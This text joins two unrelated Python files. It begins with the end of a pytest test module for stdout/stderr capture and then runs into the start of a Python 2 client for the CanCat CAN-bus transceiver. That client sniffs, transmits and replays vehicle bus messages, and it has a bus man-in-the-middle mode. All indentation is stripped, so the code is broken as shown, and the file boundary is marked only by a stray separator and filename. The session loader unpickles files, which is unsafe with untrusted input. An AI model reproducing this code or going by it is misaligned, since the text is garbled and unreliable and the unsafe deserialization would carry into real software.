assert repr(cap.in_) == "<FDCapture 0 oldfd=<UNSET> _state=None tmpfile=<UNSET>>"
cap.stop_capturing()
"""
)
result = testdir.runpytest_subprocess("--capture=fd")
assert result.ret == 0
assert result.parseoutcomes()["passed"] == 3
def test_capture_not_started_but_reset():
capsys = StdCapture()
capsys.stop_capturing()
def test_using_capsys_fixture_works_with_sys_stdout_encoding(capsys):
test_text = "test text"
print(test_text.encode(sys.stdout.encoding, "replace"))
(out, err) = capsys.readouterr()
assert out
assert err == ""
def test_capsys_results_accessible_by_attribute(capsys):
sys.stdout.write("spam")
sys.stderr.write("eggs")
capture_result = capsys.readouterr()
assert capture_result.out == "spam"
assert capture_result.err == "eggs"
@pytest.mark.parametrize("use", [True, False])
def test_fdcapture_tmpfile_remains_the_same(tmpfile, use):
if not use:
tmpfile = True
cap = StdCaptureFD(out=False, err=tmpfile)
try:
cap.start_capturing()
capfile = cap.err.tmpfile
cap.readouterr()
finally:
cap.stop_capturing()
capfile2 = cap.err.tmpfile
assert capfile2 == capfile
def test_close_and_capture_again(testdir):
testdir.makepyfile(
"""
import os
def test_close():
os.close(1)
def test_capture_again():
os.write(1, b"hello\\n")
assert 0
"""
)
result = testdir.runpytest_subprocess()
result.stdout.fnmatch_lines(
"""
*test_capture_again*
*assert 0*
*stdout*
*hello*
"""
)
@pytest.mark.parametrize("method", ["SysCapture", "FDCapture", "TeeSysCapture"])
def test_capturing_and_logging_fundamentals(testdir, method):
# here we check a fundamental feature
p = testdir.makepyfile(
"""
import sys, os
import py, logging
from _pytest import capture
cap = capture.MultiCapture(out=False, in_=False,
Capture=capture.%s)
cap.start_capturing()
logging.warning("hello1")
outerr = cap.readouterr()
print("suspend, captured %%s" %%(outerr,))
logging.warning("hello2")
cap.pop_outerr_to_orig()
logging.warning("hello3")
outerr = cap.readouterr()
print("suspend2, captured %%s" %% (outerr,))
"""
% (method,)
)
result = testdir.runpython(p)
result.stdout.fnmatch_lines(
"""
suspend, captured*hello1*
suspend2, captured*WARNING:root:hello3*
"""
)
result.stderr.fnmatch_lines(
"""
WARNING:root:hello2
"""
)
assert "atexit" not in result.stderr.str()
def test_error_attribute_issue555(testdir):
testdir.makepyfile(
"""
import sys
def test_capattr():
assert sys.stdout.errors == "replace"
assert sys.stderr.errors == "replace"
"""
)
reprec = testdir.inline_run()
reprec.assertoutcome(passed=1)
@pytest.mark.skipif(
not sys.platform.startswith("win") and sys.version_info[:2] >= (3, 6),
reason="only py3.6+ on windows",
)
def test_py36_windowsconsoleio_workaround_non_standard_streams():
"""
Ensure _py36_windowsconsoleio_workaround function works with objects that
do not implement the full ``io``-based stream protocol, for example execnet channels (#2666).
"""
from _pytest.capture import _py36_windowsconsoleio_workaround
class DummyStream:
def write(self, s):
pass
stream = DummyStream()
_py36_windowsconsoleio_workaround(stream)
def test_dontreadfrominput_has_encoding(testdir):
testdir.makepyfile(
"""
import sys
def test_capattr():
# should not raise AttributeError
assert sys.stdout.encoding
assert sys.stderr.encoding
"""
)
reprec = testdir.inline_run()
reprec.assertoutcome(passed=1)
def test_crash_on_closing_tmpfile_py27(testdir):
p = testdir.makepyfile(
"""
import threading
import sys
printing = threading.Event()
def spam():
f = sys.stderr
print('SPAMBEFORE', end='', file=f)
printing.set()
while True:
try:
f.flush()
except (OSError, ValueError):
break
def test_spam_in_thread():
t = threading.Thread(target=spam)
t.daemon = True
t.start()
printing.wait()
"""
)
# Do not consider plugins like hypothesis, which might output to stderr.
testdir.monkeypatch.setenv("PYTEST_DISABLE_PLUGIN_AUTOLOAD", "1")
result = testdir.runpytest_subprocess(str(p))
assert result.ret == 0
assert result.stderr.str() == ""
result.stdout.no_fnmatch_line("*IOError*")
def test_global_capture_with_live_logging(testdir):
# Issue 3819
# capture should work with live cli logging
# Teardown report seems to have the capture for the whole process (setup, capture, teardown)
testdir.makeconftest(
"""
def pytest_runtest_logreport(report):
if "test_global" in report.nodeid:
if report.when == "teardown":
with open("caplog", "w") as f:
f.write(report.caplog)
with open("capstdout", "w") as f:
f.write(report.capstdout)
"""
)
testdir.makepyfile(
"""
import logging
import sys
import pytest
logger = logging.getLogger(__name__)
@pytest.fixture
def fix1():
print("fix setup")
logging.info("fix setup")
yield
logging.info("fix teardown")
print("fix teardown")
def test_global(fix1):
print("begin test")
logging.info("something in test")
print("end test")
"""
)
result = testdir.runpytest_subprocess("--log-cli-level=INFO")
assert result.ret == 0
with open("caplog", "r") as f:
caplog = f.read()
assert "fix setup" in caplog
assert "something in test" in caplog
assert "fix teardown" in caplog
with open("capstdout", "r") as f:
capstdout = f.read()
assert "fix setup" in capstdout
assert "begin test" in capstdout
assert "end test" in capstdout
assert "fix teardown" in capstdout
@pytest.mark.parametrize("capture_fixture", ["capsys", "capfd"])
def test_capture_with_live_logging(testdir, capture_fixture):
# Issue 3819
# capture should work with live cli logging
testdir.makepyfile(
"""
import logging
import sys
logger = logging.getLogger(__name__)
def test_capture({0}):
print("hello")
sys.stderr.write("world\\n")
captured = {0}.readouterr()
assert captured.out == "hello\\n"
assert captured.err == "world\\n"
logging.info("something")
print("next")
logging.info("something")
captured = {0}.readouterr()
assert captured.out == "next\\n"
""".format(
capture_fixture
)
)
result = testdir.runpytest_subprocess("--log-cli-level=INFO")
assert result.ret == 0
def test_typeerror_encodedfile_write(testdir):
"""It should behave the same with and without output capturing (#4861)."""
p = testdir.makepyfile(
"""
def test_fails():
import sys
sys.stdout.write(b"foo")
"""
)
result_without_capture = testdir.runpytest("-s", str(p))
result_with_capture = testdir.runpytest(str(p))
assert result_with_capture.ret == result_without_capture.ret
out = result_with_capture.stdout.str()
assert ("TypeError: write() argument must be str, not bytes" in out) or (
"TypeError: unicode argument expected, got 'bytes'" in out
)
def test_stderr_write_returns_len(capsys):
"""Write on Encoded files, namely captured stderr, should return number of characters written."""
assert sys.stderr.write("Foo") == 3
def test_encodedfile_writelines(tmpfile: BinaryIO) -> None:
ef = capture.EncodedFile(tmpfile, encoding="utf-8")
with pytest.raises(TypeError):
ef.writelines([b"line1", b"line2"])
assert ef.writelines(["line3", "line4"]) is None # type: ignore[func-returns-value] # noqa: F821
ef.flush()
tmpfile.seek(0)
assert tmpfile.read() == b"line3line4"
tmpfile.close()
with pytest.raises(ValueError):
ef.read()
def test__get_multicapture() -> None:
assert isinstance(_get_multicapture("fd"), MultiCapture)
pytest.raises(ValueError, _get_multicapture, "unknown").match(
r"^unknown capturing method: 'unknown'"
)
|
__init__.py
|
import os
import sys
import cmd
import time
import serial
import select
import struct
import threading
import cPickle as pickle
from cancat import iso_tp
# defaults for Linux:
serialdev = '/dev/ttyACM0' # FIXME: if Windows: "COM10" is default
baud = 4000000
# command constants (used to identify messages between
# python client and the CanCat transceiver
CMD_LOG = 0x2f
CMD_LOG_HEX = 0x2e
CMD_CAN_RECV = 0x30
CMD_PING_RESPONSE = 0x31
CMD_CHANGE_BAUD_RESULT = 0x32
CMD_CAN_BAUD_RESULT = 0x33
CMD_CAN_SEND_RESULT = 0x34
CMD_ISO_RECV = 0x35
CMD_SET_FILT_MASK = 0x36
CMD_CAN_MODE_RESULT = 0x37
CMD_CAN_SEND_ISOTP_RESULT = 0x38
CMD_CAN_RECV_ISOTP_RESULT = 0x39
CMD_CAN_SENDRECV_ISOTP_RESULT = 0x3A
CMD_SET_FILT_MASK_RESULT = 0x3B
CMD_PING = 0x41
CMD_CHANGE_BAUD = 0x42
CMD_CAN_BAUD = 0x43
CMD_CAN_SEND = 0x44
CMD_CAN_MODE = 0x45
CMD_CAN_MODE_SNIFF_CAN0 = 0x00 # Start sniffing on can 0
CMD_CAN_MODE_SNIFF_CAN1 = 0x01 # Start sniffing on can 1
CMD_CAN_MODE_CITM = 0x02 # Start CITM between can1 and can2
CMD_CAN_SEND_ISOTP = 0x46
CMD_CAN_RECV_ISOTP = 0x47
CMD_CAN_SENDRECV_ISOTP = 0x48
CAN_RESP_OK = (0)
CAN_RESP_FAILINIT = (1)
CAN_RESP_FAILTX = (2)
CAN_RESP_MSGAVAIL = (3)
CAN_RESP_NOMSG = (4)
CAN_RESP_CTRLERROR = (5)
CAN_RESP_GETTXBFTIMEOUT = (6)
CAN_RESP_SENDMSGTIMEOUT = (7)
CAN_RESP_FAIL = (0xff)
CAN_RESPS = { v: k for k,v in globals().items() if k.startswith('CAN_RESP') }
# constants for setting baudrate for the CAN bus
CAN_AUTOBPS = 0
CAN_5KBPS = 1
CAN_10KBPS = 2
CAN_20KBPS = 3
CAN_25KBPS = 4
CAN_31K25BPS = 5
CAN_33KBPS = 6
CAN_40KBPS = 7
CAN_50KBPS = 8
CAN_80KBPS = 9
CAN_83K3BPS = 10
CAN_95KBPS = 11
CAN_100KBPS = 12
CAN_125KBPS = 13
CAN_200KBPS = 14
CAN_250KBPS = 15
CAN_500KBPS = 16
CAN_666KBPS = 17
CAN_1000KBPS = 18
# state constants for the Receiver thread
RXTX_DISCONN = -1
RXTX_SYNC = 0
RXTX_GO = 1
# constants for CANreplay mode
TIMING_FAST = 0
TIMING_REAL = 1
TIMING_INTERACTIVE = 2
# constants for VIEW settings:
VIEW_ASCII = 1<<0
VIEW_COMPARE = 1<<1
VIEW_BOOKMARKS = 1<<2
VIEW_TS_DELTA = 1<<3
VIEW_ENDSUM = 1<<4
VIEW_ALL = VIEW_ASCII | VIEW_COMPARE | VIEW_BOOKMARKS | VIEW_TS_DELTA | VIEW_ENDSUM
# message id's and metadata (soon to be moved into modules)
GM_messages = {
}
Ford_messages = {
}
Chrysler_messages = {
}
Toyota_messages = {
}
Honda_messages = {
}
VW_messages = {
}
Nissan_messages = {
}
Mitsubishi_messages = {
}
Hyundai_messages = {
}
Kia_messages = {
}
Suzuki_messages = {
}
Harley_messages = {
}
# helper functions for printing log messages from the CanCat Transceiver
def handleLogToScreen(message, canbuf):
print('LOG: %s' % repr(message))
def handleLogHexToScreen(message, canbuf):
num = struct.unpack("<L", message)
print('LOG: %x' % num)
def handleCanMsgsDuringSniff(message, canbuf, arbids=None):
idx, ts = canbuf._submitMessage(CMD_CAN_RECV, message)
ts = time.time()
arbid, data = canbuf._splitCanMsg(message)
if arbids:
if arbid in arbids:
print reprCanMsg(idx, ts, arbid, data)
else:
print reprCanMsg(idx, ts, arbid, data)
default_cmdhandlers = {
CMD_LOG : handleLogToScreen,
CMD_LOG_HEX: handleLogHexToScreen,
}
def loadCanBuffer(filename):
return pickle.load(file(filename))
def keystop(delay=0):
if os.name == 'posix':
return len(select.select([sys.stdin],[],[],delay)[0])
else:
return msvcrt.kbhit()
class SPECIAL_CASE(object):
pass
DONT_PRINT_THIS_MESSAGE = SPECIAL_CASE
class CanInterface(object):
def __init__(self, port=serialdev, baud=baud, verbose=False, cmdhandlers=None, comment='', load_filename=None, orig_iface=None, max_msgs=None):
'''
CAN Analysis Workspace
This can be subclassed by vendor to allow more vendor-specific code
based on the way each vendor uses the varios Buses
'''
if orig_iface != None:
self._consumeInterface(orig_iface)
return
self._go = False
self._inbuf = ''
self._trash = []
self._messages = {}
self._msg_events = {}
self._queuelock = threading.Lock()
self._max_msgs = max_msgs
self._shutdown = False
self.verbose = verbose
self.port = port
self._baud = baud
self._io = None
self._in_lock = None
self._out_lock = None
self.name = port
self._commsthread = None
self._last_can_msg = None
self.bookmarks = []
self.bookmark_info = {}
self.comments = []
if cmdhandlers == None:
cmdhandlers = default_cmdhandlers
self._cmdhandlers = cmdhandlers
if load_filename != None:
self.loadFromFile(load_filename)
# If we specify a file and no port, assume we just want to read the file, only try to guess
# ports if there is no file specified
if self.port == None and load_filename == None:
self.port = getDeviceFile()
# No filename, can't guess the port, whatcha gonna do?
if self.port == None and load_filename == None:
raise Exception("Cannot find device, and no filename specified. Please try again.")
if self.port != None:
self._reconnect()
self._startRxThread()
def _startRxThread(self):
self._go = True
self._commsthread = threading.Thread(target=self._rxtx)
self._commsthread.setDaemon(True)
self._commsthread.start()
def register_handler(self, cmd, handler):
self._cmdhandlers[cmd] = handler
def remove_handler(self, cmd):
self._cmdhandlers[cmd] = None
def _consumeInterface(self, other):
other._go = False
for k,v in vars(other).items():
setattr(self, k, v)
if other._commsthread != None:
self._startRxThread()
def _reconnect(self, port=None, baud=None):
'''
Attempt to connect/reconnect to the CanCat Transceiver
'''
if self.port == None and port == None:
print "cannot connect to an unspecified port"
return
if self._io != None:
self._io.close()
self._io = serial.Serial(port=self.port, baudrate=self._baud, dsrdtr=True)
self._io.setDTR(True)
# clear all locks and free anything waiting for them
if self._in_lock != None:
while self._in_lock.locked_lock():
self._in_lock.release()
time.sleep(.01)
self._in_lock = threading.Lock()
if self._out_lock != None:
while self._out_lock.locked_lock():
self._out_lock.release()
time.sleep(.01)
self._out_lock = threading.Lock()
time.sleep(1)
return self._io
def __del__(self):
'''
Destructor, called when the CanInterface object is being garbage collected
'''
if isinstance(self._io, serial.Serial):
print "shutting down serial connection"
self._io.close()
self._shutdown = True
if self._commsthread != None:
self._commsthread.wait()
def clearCanMsgs(self):
'''
Clear out all messages currently received on the CAN bus, allowing for
basically a new analysis session without creating a new object/connection
returns a list of the messages
'''
return self.recvall(CMD_CAN_RECV)
def _rxtx(self):
'''
Receiver thread runner. Internal use only.
Processes data from the CanCat transceiver, parses and places messages
into correct mailboxes and/or hands off to pre-configured handlers.
'''
self._rxtx_state = RXTX_SYNC
while not self._shutdown:
try:
if not self._go:
time.sleep(.04)
continue
if self.verbose > 4:
if self.verbose > 5:
print "STATE: %s" % self._rxtx_state
else:
sys.stderr.write('.')
# try to reconnect to disconnected unit (FIXME: not working right yet)
if self._rxtx_state == RXTX_DISCONN:
print "FIXME: reconnect disconnected serial port..."
time.sleep(1)
self._reconnect()
self._rxtx_state = RXTX_SYNC
continue
# fill the queue ##########################################
self._in_lock.acquire()
try:
char = self._io.read()
except serial.serialutil.SerialException, e:
self.errorcode = e
self.log("serial exception")
if "disconnected" in e.message:
self._io.close()
self._rxtx_state = RXTX_DISCONN
continue
finally:
if self._in_lock.locked_lock():
self._in_lock.release()
self._inbuf += char
#self.log("RECV: %s" % repr(self._inbuf), 4)
##########################################################
# FIXME: should we make the rest of this a separate thread, so we're not keeping messages from flowing?
# ====== it would require more locking/synchronizing...
# make sure we're synced
if self._rxtx_state == RXTX_SYNC:
if self._inbuf[0] != "@":
self._queuelock.acquire()
try:
idx = self._inbuf.find('@')
if idx == -1:
self.log("sitting on garbage...", 3)
continue
trash = self._inbuf[:idx]
self._trash.append(trash)
self._inbuf = self._inbuf[idx:]
finally:
self._queuelock.release()
self._rxtx_state = RXTX_GO
# handle buffer if we have anything in it
if self._rxtx_state == RXTX_GO:
if len(self._inbuf) < 3: continue
if self._inbuf[0] != '@':
self._rxtx_state = RXTX_SYNC
continue
pktlen = ord(self._inbuf[1]) + 2 # <size>, doesn't include "@"
if len(self._inbuf) >= pktlen:
self._queuelock.acquire()
try:
cmd = ord(self._inbuf[2]) # first bytes are @<size>
message = self._inbuf[3:pktlen]
self._inbuf = self._inbuf[pktlen:]
finally:
self._queuelock.release()
#if we have a handler, use it
cmdhandler = self._cmdhandlers.get(cmd)
if cmdhandler != None:
cmdhandler(message, self)
# otherwise, file it
else:
self._submitMessage(cmd, message)
self._rxtx_state = RXTX_SYNC
except:
if self.verbose:
sys.excepthook(*sys.exc_info())
def _submitMessage(self, cmd, message):
'''
submits a message to the cmd mailbox. creates mbox if doesn't exist.
*threadsafe*
'''
timestamp = time.time()
self._queuelock.acquire()
try:
mbox = self._messages.get(cmd)
if mbox == None:
mbox = []
self._messages[cmd] = mbox
self._msg_events[cmd] = threading.Event()
mbox.append((timestamp, message))
self._msg_events[cmd].set()
except Exception, e:
self.log("_submitMessage: ERROR: %r" % e, -1)
finally:
self._queuelock.release()
return len(mbox)-1, timestamp
def log(self, message, verbose=2):
'''
print a log message. Only prints if CanCat's verbose setting >=verbose
'''
if self.verbose >= verbose:
print "%.2f %s: %s" % (time.time(), self.name, message)
def recv(self, cmd, wait=None):
'''
Warning: Destructive:
removes a message from a mailbox and returns it.
For CMD_CAN_RECV mailbox, this will alter analysis results!
'''
start = time.time()
while (time.time() - start) < wait:
mbox = self._messages.get(cmd)
if mbox != None and len(mbox):
self._queuelock.acquire()
try:
timestamp, message = mbox.pop(0)
finally:
self._queuelock.release()
return timestamp, message
time.sleep(.01)
return None, None
def recvall(self, cmd):
'''
Warning: Destructive:
removes ALL messages from a mailbox and returns them.
For CMD_CAN_RECV mailbox, this is like getting a new
analysis session
'''
mbox = self._messages.get(cmd)
if mbox == None:
return []
self._queuelock.acquire()
try:
messages = list(mbox)
self._messages[cmd] = []
finally:
self._queuelock.release()
return messages
def _inWaiting(self, cmd):
'''
Does the given cmd mailbox have any messages??
'''
mbox = self._messages.get(cmd)
if mbox == None:
return 0
return len(mbox)
def _send(self, cmd, message):
'''
Send a message to the CanCat transceiver (not the CAN bus)
'''
msgchar = struct.pack(">H", len(message) + 3) # 2 byte Big Endian
msg = msgchar + chr(cmd) + message
self.log("XMIT: %s" % repr(msg), 4)
self._out_lock.acquire()
try:
self._io.write(msg)
finally:
self._out_lock.release()
# FIXME: wait for response?
def CANrecv(self, count=1):
'''
Warning: Destructive:
removes a message from the received CAN messages and returns it.
== This will alter analysis results! ==
'''
if count == -1:
count = self.getCanMsgCount()
for x in range(count):
yield self.recv(CMD_CAN_RECV)
def CANxmit(self, arbid, message, extflag=0, timeout=3, count=1):
'''
Transmit a CAN message on the attached CAN bus
Currently returns the *last* result
'''
msg = struct.pack('>I', arbid) + chr(extflag) + message
for i in range(count):
self._send(CMD_CAN_SEND, msg)
ts, result = self.recv(CMD_CAN_SEND_RESULT, timeout)
if result == None:
print "CANxmit: Return is None!?"
return None
resval = ord(result)
if resval != 0:
print "CANxmit() failed: %s" % CAN_RESPS.get(resval)
return resval
def ISOTPxmit(self, tx_arbid, rx_arbid, message, extflag=0, timeout=3, count=1):
'''
Transmit an ISOTP can message. tx_arbid is the arbid we're transmitting,
and rx_arbid is the arbid we're listening for
'''
msg = struct.pack('>IIB', tx_arbid, rx_arbid, extflag) + message
for i in range(count):
self._send(CMD_CAN_SEND_ISOTP, msg)
ts, result = self.recv(CMD_CAN_SEND_ISOTP_RESULT, timeout)
if result == None:
print "ISOTPxmit: Return is None!?"
resval = ord(result)
if resval != 0:
print "ISOTPxmit() failed: %s" % CAN_RESPS.get(resval)
return resval
def ISOTPrecv(self, tx_arbid, rx_arbid, extflag=0, timeout=3, count=1, start_msg_idx=None):
'''
Receives an ISOTP can message. This function just causes
the hardware to send the appropriate flow control command
when an ISOTP frame is received from rx_arbid, using
tx_arbid for the flow control frame. The ISOTP frame
itself needs to be extracted from the received can messages
'''
if start_msg_idx is None:
start_msg_idx = self.getCanMsgCount()
# set the CANCat to respond to Flow Control messages
resval = self._isotp_enable_flowcontrol(tx_arbid, rx_arbid, extflag)
msg = self._getIsoTpMsg(rx_arbid, start_index=start_msg_idx, timeout=timeout)
return msg
def _isotp_enable_flowcontrol(self, tx_arbid, rx_arbid, extflag):
msg = struct.pack('>IIB', tx_arbid, rx_arbid, extflag)
self._send(CMD_CAN_RECV_ISOTP, msg)
ts, result = self.recv(CMD_CAN_RECV_ISOTP_RESULT, timeout)
if result == None:
print "_isotp_enable_flowcontrol: Return is None!?"
resval = ord(result)
if resval != 0:
print "_isotp_enable_flowcontrol() failed: %s" % CAN_RESPS.get(resval)
return resval
def ISOTPxmit_recv(self, tx_arbid, rx_arbid, message, extflag=0, timeout=3, count=1, service=None):
'''
Transmit an ISOTP can message, then wait for a response.
tx_arbid is the arbid we're transmitting, and rx_arbid
is the arbid we're listening for
'''
currIdx = self.getCanMsgCount()
msg = struct.pack('>II', tx_arbid, rx_arbid) + chr(extflag) + message
for i in range(count):
self._send(CMD_CAN_SENDRECV_ISOTP, msg)
ts, result = self.recv(CMD_CAN_SENDRECV_ISOTP_RESULT, timeout)
if result == None:
print "ISOTPxmit: Return is None!?"
resval = ord(result)
if resval != 0:
print "ISOTPxmit() failed: %s" % CAN_RESPS.get(resval)
msg = self._isotp_get_msg(rx_arbid, start_index = currIdx, service = service, timeout = timeout)
return msg
def _isotp_get_msg(self, rx_arbid, start_index=0, service=None, timeout=None):
'''
Internal Method to piece together a valid ISO-TP message from received CAN packets.
'''
found = False
complete = False
starttime = lasttime = time.time()
while not complete and (not timeout or (lasttime-starttime < timeout)):
msgs = [msg for msg in self.genCanMsgs(start=start_index, arbids=[rx_arbid])]
if len(msgs):
try:
# Check that the message is for the expected service, if specified
arbid, msg, count = iso_tp.msg_decode(msgs)
if ord(msg[0]) == 0x7e: # response for TesterPresent... ignore
start_index = msgs[count-1][0] + 1
elif service is not None:
# Check if this is the right service, or there was an error
if ord(msg[0]) == service or ord(msg[0]) == 0x7f:
msg_found = True
return msg
print "Hey, we got here, wrong service code?"
print msg.encode('hex')
start_index = msgs[count-1][0] + 1
else:
msg_found = True
return msg
except iso_tp.IncompleteIsoTpMsg, e:
#print e # debugging only, this is expected
pass
time.sleep(0.1)
lasttime = time.time()
#print "_isotp_get_msg: status: %r - %r (%r) > %r" % (lasttime, starttime, (lasttime-starttime), timeout)
print "_isotp_get_msg: Timeout: %r - %r (%r) > %r" % (lasttime, starttime, (lasttime-starttime), timeout)
return None
def CANsniff(self, start_msg=None, arbids=None, advfilters=[], maxmsgs=None):
'''
Print messages in real time.
start_msg - first message to print
(None: the next message captured, 0: first message since starting CanCat)
arbids - list of arbids to print (others will be ignored)
advfilters - list of python code to eval for each message (message context provided)
eg. ['pf==0xeb', 'sa==0', 'ps & 0xf']
will print TP data message from source address 0 if the top 4 bits of PS
are set.
Expressions are evaluated from left to right in a "and" like fashion. If any
expression evaluates to "False" and the message will be ignored.
Variables mapped into default namespace:
'arbid'
'id'
'ts'
'data'
J1939 adds 'pgn', 'pf', 'ps', 'edp', 'dp', 'sa'
(this description is true for all advfilters, not specifically CANsniff)
'''
count = 0
msg_gen = self.reprCanMsgsLines(start_msg=start_msg, arbids=arbids, advfilters=advfilters, tail=True)
while True:
if maxmsgs != None and maxmsgs < count:
return
line = msg_gen.next()
print line
count += 1
if keystop():
break
def CANreplay(self, start_bkmk=None, stop_bkmk=None, start_msg=0, stop_msg=None, arbids=None, timing=TIMING_FAST):
'''
Replay packets between two bookmarks.
timing = TIMING_FAST: just slam them down the CAN bus as fast as possible
timing = TIMING_READ: send the messages using similar timing to how they
were received
timing = TIMING_INTERACTIVE: wait for the user to press Enter between each
message being transmitted
'''
if start_bkmk != None:
start_msg = self.getMsgIndexFromBookmark(start_bkmk)
if stop_bkmk != None:
stop_msg = self.getMsgIndexFromBookmark(stop_bkmk)
last_time = -1
newstamp = time.time()
for idx,ts,arbid,data in self.genCanMsgs(start_msg, stop_msg, arbids=arbids):
laststamp = newstamp
newstamp = time.time()
delta_correction = newstamp - laststamp
if timing == TIMING_INTERACTIVE:
char = raw_input("Transmit this message? %s (Y/n)" % reprCanMsg(idx, ts, arbid, data))
if char is not None and len(char) > 0 and char[0] == 'n':
return
elif timing == TIMING_REAL:
if last_time != -1:
delta = ts - last_time - delta_correction
if delta >= 0:
time.sleep(delta)
last_time = ts
self.CANxmit(arbid, data)
if timing == TIMING_INTERACTIVE:
print "Message transmitted"
def setCanBaud(self, baud_const=CAN_500KBPS):
'''
set the baud rate for the CAN bus. this has nothing to do with the
connection from the computer to the tool
'''
self._send(CMD_CAN_BAUD, chr(baud_const))
response = self.recv(CMD_CAN_BAUD_RESULT, wait=30)
while(response[1] != '\x01'):
print "CAN INIT FAILED: Retrying"
response = self.recv(CMD_CAN_BAUD_RESULT, wait=30)
def setCanMode(self, mode):
'''
Sets the desired operation mode. Note that just setting the operational mode
does not change anything on the hardware, after changing the mode you must change
the baud rate in order to properly configure the hardware
'''
CAN_MODES = { v: k for k,v in globals().items() if k.startswith('CMD_CAN_MODE_') and k is not 'CMD_CAN_MODE_RESULT' }
if mode not in CAN_MODES:
print "{} is not a valid can mode. Valid modes are:".format(mode)
for k in CAN_MODES:
print "{} ({})".format(CAN_MODES[k], k)
else:
self._send(CMD_CAN_MODE, chr(mode))
response = self.recv(CMD_CAN_MODE_RESULT, wait=30)
while(response[1] != '\x01'):
print "CAN INIT FAILED: Retrying"
response = self.recv(CMD_CAN_MODE_RESULT, wait=30)
def ping(self, buf='ABCDEFGHIJKL'):
'''
Utility function, only to send and receive data from the
CanCat Transceiver. Has no effect on the CAN bus
'''
self._send(CMD_PING, buf)
response = self.recv(CMD_PING_RESPONSE, wait=3)
return response
def genCanMsgs(self, start=0, stop=None, arbids=None, tail=False, maxsecs=None):
'''
CAN message generator. takes in start/stop indexes as well as a list
of desired arbids (list)
maxsecs limits the number of seconds this generator will go for. it's intended
for use with tail
'''
messages = self._messages.get(CMD_CAN_RECV, None)
# get the ts of the first received message
if messages != None and len(messages):
startts = messages[0][0]
else:
startts = time.time()
if start == None:
start = self.getCanMsgCount()
if messages == None:
stop = 0
elif stop == None or tail:
stop = len(messages)
else:
stop = stop + 1 # This makes the stop index inclusive if specified
starttime = time.time()
idx = start
while tail or idx < stop:
# obey our time restrictions
# placed here to ensure checking whether we're receiving messages or not
if maxsecs != None and time.time() > maxsecs+starttime:
return
# If we start sniffing before we receive any messages,
# messages will be "None". In this case, each time through
# this loop, check to see if we have messages, and if so,
# re-create the messages handle
if messages == None:
messages = self._messages.get(CMD_CAN_RECV, None)
# if we're off the end of the original request, and "tailing"
if messages != None:
if tail and idx >= stop:
msglen = len(messages)
self.log("stop=%d len=%d" % (stop, msglen), 3)
if stop == msglen:
self.log("waiting for messages", 3)
# wait for trigger event so we're not constantly polling
self._msg_events[CMD_CAN_RECV].wait(1)
self._msg_events[CMD_CAN_RECV].clear()
self.log("received 'new messages' event trigger", 3)
# we've gained some messages since last check...
stop = len(messages)
continue # to the big message loop.
# now actually handle messages
ts, msg = messages[idx]
# make ts an offset instead of the real time.
ts -= startts
arbid, data = self._splitCanMsg(msg)
if arbids != None and arbid not in arbids:
# allow filtering of arbids
idx += 1
continue
yield((idx, ts, arbid, data))
idx += 1
def _splitCanMsg(self, msg):
'''
takes in captured message
returns arbid and data
does not check msg size. MUST be at least 4 bytes in length as the
tool should send 4 bytes for the arbid
'''
arbid = struct.unpack(">I", msg[:4])[0]
data = msg[4:]
return arbid, data
def getCanMsgCount(self):
'''
the number of CAN messages we've received this session
'''
canmsgs = self._messages.get(CMD_CAN_RECV, [])
return len(canmsgs)
def printSessionStatsByBookmark(self, start=None, stop=None):
'''
Prints session stats only for messages between two bookmarks
'''
print self.getSessionStatsByBookmark(start, stop)
def printSessionStats(self, start=0, stop=None):
'''
Print session stats by Arbitration ID (aka WID/PID/CANID/etc...)
between two message indexes (where they sit in the CMD_CAN_RECV
mailbox)
'''
print self.getSessionStats(start, stop)
def getSessionStatsByBookmark(self, start=None, stop=None):
'''
returns session stats by bookmarks
'''
if start != None:
start_msg = self.getMsgIndexFromBookmark(start)
else:
start_msg = 0
if stop != None:
stop_msg = self.getMsgIndexFromBookmark(stop)
else:
stop_msg = self.getCanMsgCount()
return self.getSessionStats(start=start_msg, stop=stop_msg)
def getArbitrationIds(self, start=0, stop=None, reverse=False):
'''
return a list of Arbitration IDs
'''
arbids = {}
msg_count = 0
for idx,ts,arbid,data in self.genCanMsgs(start, stop):
arbmsgs = arbids.get(arbid)
if arbmsgs == None:
arbmsgs = []
arbids[arbid] = arbmsgs
arbmsgs.append((ts, data))
msg_count += 1
arbid_list = [(len(msgs), arbid, msgs) for arbid,msgs in arbids.items()]
arbid_list.sort(reverse=reverse)
return arbid_list
def getSessionStats(self, start=0, stop=None):
out = []
arbid_list = self.getArbitrationIds(start=start, stop=stop, reverse=True)
for datalen, arbid, msgs in arbid_list:
last = 0
high = 0
low = 0xffffffff
for ts, data in msgs:
if last == 0:
last = ts
continue
# calculate the high and low
delta = ts - last
if delta > high:
high = delta
if delta < low:
low = delta
# track repeated values (rounded to nearest .001 sec)
last = ts
if datalen > 1:
mean = (msgs[-1][0] - msgs[0][0]) / (datalen-1)
median = low + (high-low) / 2
else:
low = 0
mean = 0
median = mean
out.append("id: 0x%x\tcount: %d\ttiming:: mean: %.3f\tmedian: %.3f\thigh: %.3f\tlow: %.3f" % \
(arbid, datalen, mean, median, high, low))
msg_count = self.getCanMsgCount()
out.append("Total Uniq IDs: %d\nTotal Messages: %d" % (len(arbid_list), msg_count))
return '\n'.join(out)
def loadFromFile(self, filename, force=False):
'''
Load a previous analysis session from a saved file
see: saveSessionToFile()
'''
me = pickle.load(file(filename))
self.restoreSession(me, force=force)
self._filename = filename
def restoreSession(self, me, force=False):
'''
Load a previous analysis session from a python dictionary object
see: saveSession()
'''
if isinstance(self._io, serial.Serial) and force==False:
print("Refusing to reload a session while active session! use 'force=True' option")
return
self._messages = me.get('messages')
self.bookmarks = me.get('bookmarks')
self.bookmark_info = me.get('bookmark_info')
self.comments = me.get('comments')
def saveSessionToFile(self, filename=None):
'''
Saves the current analysis session to the filename given
If saved previously, the name will already be cached, so it is
unnecessary to provide it again.
'''
if filename != None:
self._filename = filename
elif self._filename == None:
raise Exception('Cannot save to file when no filename given (and first time save)')
else:
filename = self._filename
savegame = self.saveSession()
me = pickle.dumps(savegame)
outfile = file(filename, 'w')
outfile.write(me)
outfile.close()
def saveSession(self):
'''
Save the current analysis session to a python dictionary object
What you do with it form there is your own business.
This function is called by saveSessionToFile() to get the data
to save to the file.
'''
savegame = { 'messages' : self._messages,
'bookmarks' : self.bookmarks,
'bookmark_info' : self.bookmark_info,
'comments' : self.comments,
}
return savegame
# bookmark subsystem
def placeCanBookmark(self, name=None, comment=None):
'''
Save a named bookmark (with optional comment).
This stores the message index number from the
CMD_CAN_RECV mailbox.
DON'T USE CANrecv or recv(CMD_CAN_RECV) with Bookmarks or Snapshots!!
'''
